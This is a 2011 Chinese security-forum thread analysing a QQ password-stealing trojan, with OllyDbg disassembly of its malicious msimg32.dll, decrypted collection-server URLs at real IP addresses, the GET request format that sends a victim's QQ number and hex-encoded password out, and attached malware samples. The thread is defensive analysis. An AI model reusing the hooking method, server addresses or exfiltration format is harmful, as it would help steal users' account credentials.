首页
社区
课程
招聘
[原创]最新QQ盗号木马分析,内含增肥术
发表于: 2011-6-14 00:44 33518

[原创]最新QQ盗号木马分析,内含增肥术

2011-6-14 00:44
33518

拿到这个样本时,他的名字叫"29.exe",拿起PEID查之,UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo [Overlay],是个压缩壳,然后在看下他有没有附加数据,用Stud_PE查之,如果有,看来是木马生成器生成的!

OK.OD载入,ESP定律,迅速到达OEP!

00402310    6A 00           push    0
00402312    FF15 18204000   call    near dword ptr ds:[402018]       ; kernel32.GetModuleHandleA
00402318    A3 A4364000     mov     dword ptr ds:[4036A4], eax       ; 29.00400000
0040231D    FF15 14204000   call    near dword ptr ds:[402014]       ; kernel32.GetCommandLineA
00402323    6A 0A           push    0A
00402325    A3 A0364000     mov     dword ptr ds:[4036A0], eax       ; 29.00400000
0040232A    50              push    eax                              ; 29.00400000
0040232B    A1 A4364000     mov     eax, dword ptr ds:[4036A4]
00402330    6A 00           push    0
00402332    50              push    eax                              ; 29.00400000
00402333    E8 58000000     call    00402390


[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!

上传的附件:
  • 3.jpg (45.92kb,2013次下载)
  • 2.jpg (56.09kb,2010次下载)
  • 4.jpg (17.83kb,2006次下载)
  • 5.jpg (36.93kb,2008次下载)
  • 6.jpg (26.06kb,2002次下载)
  • 29.rar (75.35kb,93次下载)
收藏
免费 7
支持
分享
最新回复 (39)
雪    币: 656
活跃值: (448)
能力值: ( LV12,RANK:360 )
在线值:
发帖
回帖
粉丝
2
在写此文之前我已经分析过了,要说明的是该DLL我们不能用OD单独分析,否则你不知道他干了什么,因为他只有被QQ.EXE载入他才会有所行为,所以我们要调试QQ才行,在此之前我们要修改一下msimg32.dll的入口,因为我们用OD载入QQ时,其DLL文件都被载入了,我们只需要在msimg32.dll入口修改成int3,然后设置取消OD对INT3的断点忽略:

不然载入时会悲剧的出现应用程序初始化失败的信息框提示:

设置好后,重新载入就会断在msimg32.dll入口上面了,把修改的字节改过来,重新设置EIP,开始分析.


因为之前分析过了,为了节约时间,大家先直接用BP CreateThread 下断,因为他的主体部分是从线程开始!

0012F85C   6300198D  /CALL 到 CreateThread 来自 MSIMG32.6300198B
0012F860   00000000  |pSecurity = NULL
0012F864   00000000  |StackSize = 0
0012F868   63002D50  |ThreadFunction = MSIMG32.63002D50  转到这里,下断
0012F86C   00000000  |pThreadParm = NULL
0012F870   00000000  |CreationFlags = 0
0012F874   00000000  \pThreadId = NULL

然后到达这里:

63002D50    83EC 10         sub     esp, 10
63002D53    56              push    esi                              ; kernel32.GetModuleHandleA
63002D54    57              push    edi                              ; kernel32.Sleep
63002D55    E8 663A0000     call    630067C0                         ; 里面有三个CALL,分别把用到的3个库中的API载入
63002D5A    8B35 18100063   mov     esi, dword ptr ds:[63001018]     ; kernel32.GetModuleHandleA
63002D60    B0 64           mov     al, 64
63002D62    884424 13       mov     byte ptr ss:[esp+13], al
63002D66    884424 0F       mov     byte ptr ss:[esp+F], al
63002D6A    8D4424 08       lea     eax, dword ptr ss:[esp+8]
63002D6E    B2 61           mov     dl, 61
63002D70    B1 74           mov     cl, 74
63002D72    50              push    eax
63002D73    C705 70810063 1>mov     dword ptr ds:[63008170], 12
63002D7D    C64424 0E 53    mov     byte ptr ss:[esp+E], 53
63002D82    885424 0F       mov     byte ptr ss:[esp+F], dl
63002D86    C64424 10 66    mov     byte ptr ss:[esp+10], 66
63002D8B    884C24 15       mov     byte ptr ss:[esp+15], cl
63002D8F    C64424 16 2E    mov     byte ptr ss:[esp+16], 2E
63002D94    C64424 11 65    mov     byte ptr ss:[esp+11], 65
63002D99    C64424 12 45    mov     byte ptr ss:[esp+12], 45
63002D9E    C64424 0C 54    mov     byte ptr ss:[esp+C], 54
63002DA3    C64424 0D 53    mov     byte ptr ss:[esp+D], 53
63002DA8    C64424 14 69    mov     byte ptr ss:[esp+14], 69
63002DAD    885424 18       mov     byte ptr ss:[esp+18], dl
63002DB1    884C24 19       mov     byte ptr ss:[esp+19], cl
63002DB5    C64424 1A 00    mov     byte ptr ss:[esp+1A], 0
63002DBA    FFD6            call    near esi                         ; 判断TSSafeEdit.dat是否已经被载入
63002DBC    8B3D 20100063   mov     edi, dword ptr ds:[63001020]     ; kernel32.Sleep
63002DC2    85C0            test    eax, eax
63002DC4    75 12           jnz     short 63002DD8                   ; 如果还没有载入,就等待载入
63002DC6    68 F4010000     push    1F4
63002DCB    FFD7            call    near edi                         ; kernel32.Sleep
63002DCD    8D4C24 08       lea     ecx, dword ptr ss:[esp+8]
63002DD1    51              push    ecx
63002DD2    FFD6            call    near esi                         ; kernel32.GetModuleHandleA
63002DD4    85C0            test    eax, eax
63002DD6  ^ 74 EE           je      short 63002DC6                   ; 直到TSSafeEdit被载入才执行下面的代码
63002DD8    E8 33ECFFFF     call    63001A10                         ; 内含VM,还没能力分析,是对TSSafeEdit的一些猥琐操作
63002DDD    E8 3EEAFFFF     call    63001820                         ; 挂钩 SendInput[COLOR="Red"],手法挺妙的[/COLOR]




63002DE2    E8 F9EEFFFF     call    63001CE0                         ; 判断LoginCtrl.dll是否被载入,我当前是没有载入的情况,直接跳出
63002DE7    85C0            test    eax, eax
63002DE9    75 0F           jnz     short 63002DFA                   ; MSIMG32.63002DFA
63002DEB    C705 B8870063 0>mov     dword ptr ds:[630087B8], 1       ; 记录"LoginCtrl.dll"没有载入
63002DF5    E8 56F7FFFF     call    63002550                         ; 对"KernelUtil.dll"部分地址进行挂钩,有VM,压力很大,无力分析
63002DFA    E8 61000000     call    63002E60                                           ; 解密29.exe覆盖进的附加数据,解密算法很高级,[COLOR="Red"]求此算法名称[/COLOR]~


0050F738  68 74 74 70 73 3A 2F 2F 31 32 31 2E 32 30 35 2E  https://121.205.
0050F748  38 39 2E 32 31 31 3A 38 30 38 30 2F 64 64 2F 68  89.211:8080/dd/h
0050F758  6F 68 6F 2E 61 73 70 00 00 00 00 00 00 00 00 00  oho.asp.........
0050F768  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0050F778  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0050F788  00 00 00 00 00 00 00 00 00 00 68 74 74 70 3A 2F  ..........http:/
0050F798  2F 32 32 32 2E 32 31 31 2E 36 34 2E 32 31 36 3A  /222.211.64.216:
0050F7A8  38 37 2F 64 64 2F 61 73 70 78 2E 61 73 70 00 00  87/dd/aspx.asp..
0050F7B8  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0050F7C8  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0050F7D8  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0050F7E8  00 00 00 00 68 74 74 70 73 3A 2F 2F 35 39 2E 36  ....https://59.6
0050F7F8  30 2E 32 31 2E 31 35 39 3A 34 30 30 30 2F 64 64  0.21.159:4000/dd
0050F808  2F 67 6F 2E 61 73 70 00 00 00 00 00 00 00 00 00  /go.asp.........
0050F818  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0050F828  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0050F838  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0050F848  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0050F858  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0050F868  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0050F878  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0050F888  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0050F898  00 00 00 00 00 00 00 00 68 74 74 70 3A 2F 2F 00  ........http://.
0050F8A8  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0050F8B8  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0050F8C8  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0050F8D8  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0050F8E8  00 00 00 00 00 00 00 00 64 64 00 00 00 00 00 00  ........dd......
0050F8F8  00 00 73 64 66 73 00 00 00 00 00 00 00 00 00 00  ..sdfs..........
0050F908  00 00 00 00 00 00 00 00 DE 00 3C 00 00 10 00 00  ........?<....
0050F918  78 01 50 00 78 01 50 00 00 00 00 00 00 00 00 00  xP.xP.........
0050F928  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................

https://121.205.89.211:8080/dd/hoho.asp
http://222.211.64.216:87/dd/aspx.asp
https://59.60.21.159:4000/dd/go.asp
http://
dd
sdfs

然后等登录成功后就会发送到目标地址 如:

GET dd/aspx.asp?Uid=1661129844&Upa=6161616138383838&B=0&D=0>=0&ll=ff&Fs=293FF4FE
上传的附件:
2011-6-14 00:46
0
雪    币: 160
活跃值: (11)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
3
过来帮你顶下
2011-6-14 00:52
0
雪    币: 278
活跃值: (709)
能力值: ( LV15,RANK:520 )
在线值:
发帖
回帖
粉丝
4
没看懂汇编代码啥意思
2011-6-14 12:08
0
雪    币: 656
活跃值: (448)
能力值: ( LV12,RANK:360 )
在线值:
发帖
回帖
粉丝
5
已加入msimg32.dll 分析

分析的很烂,凑合着看吧

欢迎大家来做补充
2011-6-15 00:15
0
雪    币: 222
活跃值: (478)
能力值: ( LV11,RANK:188 )
在线值:
发帖
回帖
粉丝
6
分析的很妙。    提到xuetr了,就应该用一下xuetr最猛最爽的一个功能啊
应用层钩子->进程钩子->[952]QQ.exe->检测。这下爽到爆了吧!哈哈
2011-6-15 02:35
0
雪    币: 11
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
7
分析很到位呀。。顶
2011-6-15 09:01
0
雪    币: 220
活跃值: (726)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
8
2个HTTP开头的应该是后门
2011-6-15 09:36
0
雪    币: 227
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
9
盗吧盗吧,我还是新人
2011-6-15 09:44
0
雪    币: 220
活跃值: (726)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
10
https://121.205.89.211:8080/dd/hoho.asp
http://222.211.64.216:87/dd/aspx.asp
https://59.60.21.159:4000/dd/go.asp
http://
dd
sdfs

你这些数据是怎么解出来的呀?
2011-6-15 18:19
0
雪    币: 777
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
11
不错   顶LZ一个
2011-6-15 18:24
0
雪    币: 545
活跃值: (1507)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
12
希望能分析下,偷取 MM的地方。。。
2011-6-15 22:02
0
雪    币: 656
活跃值: (448)
能力值: ( LV12,RANK:360 )
在线值:
发帖
回帖
粉丝
13
63002DFA    E8 61000000     call    63002E60                                           ; 解密29.exe覆盖进的附加数据,解密算法很高级,求此算法名称~
2011-6-16 11:45
0
雪    币: 220
活跃值: (726)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
14
LZ不能还原出他的算法?
2011-6-16 15:32
0
雪    币: 768
活跃值: (535)
能力值: ( LV13,RANK:460 )
在线值:
发帖
回帖
粉丝
15
欣赏楼主美文:)
2011-6-17 07:52
0
雪    币: 436
活跃值: (25)
能力值: ( LV3,RANK:20 )
在线值:
发帖
回帖
粉丝
16
跟着楼主学习了
2011-6-17 08:07
0
雪    币: 210
活跃值: (20)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
17
我主要看看我的杀软报不报
2011-6-17 08:39
0
雪    币: 163
活跃值: (75)
能力值: ( LV3,RANK:30 )
在线值:
发帖
回帖
粉丝
18
安置WM_KEYBOARD_LL钩子可以搞定
2011-6-17 09:36
0
雪    币: 71
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
19
支持一下

3q
2011-6-17 14:03
0
雪    币: 120
活跃值: (160)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
20
好文。。。这才是真正的病毒分析。
2011-6-17 14:13
0
雪    币: 230
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
21
几天前去了广东,朋友在我的电脑上网,我的电脑也中招了。
回来上网,三个QQ都被盗了。
有两个号有一代的密码保护,但申请后就没用过,不太记得,试了好多次才申诉成功。
但还有一个小号,平时很少登录,说是没在经常登录的地点登录,改不了密码。
而且没搞密保,申诉了N次都搞不回来。浪费我三天了。

我打开网络监控,发现登录QQ的后不久,QQ会向以下IP发送数据,比较可疑。
121.14.100.184:80 中山市
121.205.89.211:8080 福建省
222.211.64.216:87 四川成都
183.60.3.162
222.186.19.19:80 江苏镇江
124.115.2.219:443 陕西西安
220.170.192.10:80 湖南邵阳

看了楼主的文章,我发现在我的QQ文件夹下的BIN子文件夹下,确实有一个msimg32.dll文件,
是隐藏的,有25.0MB(刚好25M),创建日期和其它的dll文件也不一样。
但是压缩以后只有207KB
传上来让大家研究一下。
上传的附件:
2011-6-18 22:09
0
雪    币: 105
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
22
我竟然奇迹地略读了一遍 佩服我自己哈
顺便支持下楼主
2011-6-18 22:31
0
雪    币: 500
活跃值: (1000)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
23
我来膜拜楼主
2011-6-18 22:43
0
雪    币: 2323
活跃值: (4113)
能力值: ( LV12,RANK:530 )
在线值:
发帖
回帖
粉丝
24
过来学习~~
2011-6-18 23:11
0
雪    币: 270
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
25
熊猫小正正也出动了
2011-6-21 23:14
0
游客
登录 | 注册 方可回帖
返回
//